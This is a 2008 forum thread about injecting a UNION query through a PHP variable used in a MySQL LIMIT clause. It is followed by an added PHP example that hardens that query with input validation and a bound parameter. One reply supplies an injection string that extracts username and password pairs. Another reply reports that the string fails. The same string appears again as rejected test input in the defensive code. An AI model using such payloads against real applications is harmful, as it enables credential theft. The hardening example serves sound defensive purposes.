[MySQL] ORDER BY and UNION syntax problem
Posted by: EgiX
Date: February 03, 2008 07:31PM

hi guys! i've a question about a SQL injection into LIMIT statement in a query similar to this:

$SQL = "SELECT name FROM options ORDER BY name LIMIT $start, 25";

where i can handle $start...but if i try to inject a UNION statement by $start there is a problem with the ORDER BY and UNION syntax, the MySQL manual says:

Quote

To use an ORDER BY or LIMIT clause to sort or limit the entire UNION result,
parenthesize the individual SELECT statements and place the ORDER BY or LIMIT after the last one.
The following example uses both clauses:

(SELECT a FROM t1 WHERE a=10 AND B=1)
UNION
(SELECT a FROM t2 WHERE a=11 AND B=2)
ORDER BY a LIMIT 10;

so, how can i inject syntactically correct SQL code into the $start parameter without any parentheses? is it possible?

thanks in advance!

EDIT: sorry, i've posted in the wrong section...can i delete my post?!



Edited 1 time(s). Last edit at 02/03/2008 07:35PM by EgiX.

Re: [MySQL] ORDER BY and UNION syntax problem
Posted by: adamlang
Date: May 29, 2008 09:09AM

you just need to carry it on into the next sql statement

$start = "0,0 UNION select concat(username,':',password) from users LIMIT 0,";

which would make the whole query:

$SQL = "SELECT name FROM options ORDER BY name LIMIT 0,0 UNION select concat(username,':',password) from users LIMIT 0, 25";

this would force the first query to retrieve 0 rows and then the second query would retrieve the first 25 usernames and passwords from the users database.

Re: [MySQL] ORDER BY and UNION syntax problem
Posted by: Raz0r
Date: June 07, 2008 12:14PM

have you tried your query before posting? it doesn't work:
Quote

Incorrect usage of UNION and ORDER BY

http://Raz0r.name - a web-security blog ( in Russian )

Re: [MySQL] ORDER BY and UNION syntax problem
Posted by: backbone
Date: June 09, 2008 06:38AM

http://dev.mysql.com/doc/refman/5.0/en/order-by-optimization.html

throw a find on "Henrik Grubbström" to have the answer to the UNION, LIMIT, ORDER BY combination...

or just take a look at the following query...

(SELECT * FROM t1 FORCE INDEX (key1_key2_key3)
WHERE key1=1 ORDER BY key2,key3 LIMIT 10)
UNION
(SELECT * FROM t1 FORCE INDEX (key1_key2_key3)
WHERE key1=2 ORDER BY key2,key3 LIMIT 10)
ORDER BY key2,key3 LIMIT 5, 5

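The hardened form of the query from the first post, as an added example that is not part of the thread: `$start` is validated as a non-negative integer and bound with `PDO::PARAM_INT` instead of being interpolated into the string. The `parse_start` and `fetch_options` helpers and the in-memory SQLite data are assumptions made for illustration; the application in the thread uses MySQL.

```php
<?php
// Added example, not code from the thread. Table and column names follow the
// query in the first post; the in-memory SQLite database and its rows are
// constructed sample data so the script runs offline.

function parse_start($raw): int
{
    // Accept only a non-negative decimal integer. Input such as
    // "0,0 UNION ..." fails validation before it gets near the query.
    $start = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($start === false) {
        throw new InvalidArgumentException('start must be a non-negative integer');
    }
    return $start;
}

function fetch_options(PDO $pdo, $rawStart): array
{
    // The offset is a bound parameter, so it can never extend the statement.
    $stmt = $pdo->prepare('SELECT name FROM options ORDER BY name LIMIT :start, 25');
    // PDO::PARAM_INT matters: with pdo_mysql and emulated prepares, a value
    // bound as a string is quoted and MySQL rejects a quoted value in LIMIT.
    $stmt->bindValue(':start', parse_start($rawStart), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE options (name TEXT)');
$pdo->exec("INSERT INTO options (name) VALUES ('alpha'), ('beta'), ('gamma')");

// Constructed inputs: two ordinary offsets and the string from the second post.
$inputs = ['0', '2', "0,0 UNION select concat(username,':',password) from users LIMIT 0,"];
foreach ($inputs as $raw) {
    try {
        echo json_encode(fetch_options($pdo, $raw)), "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```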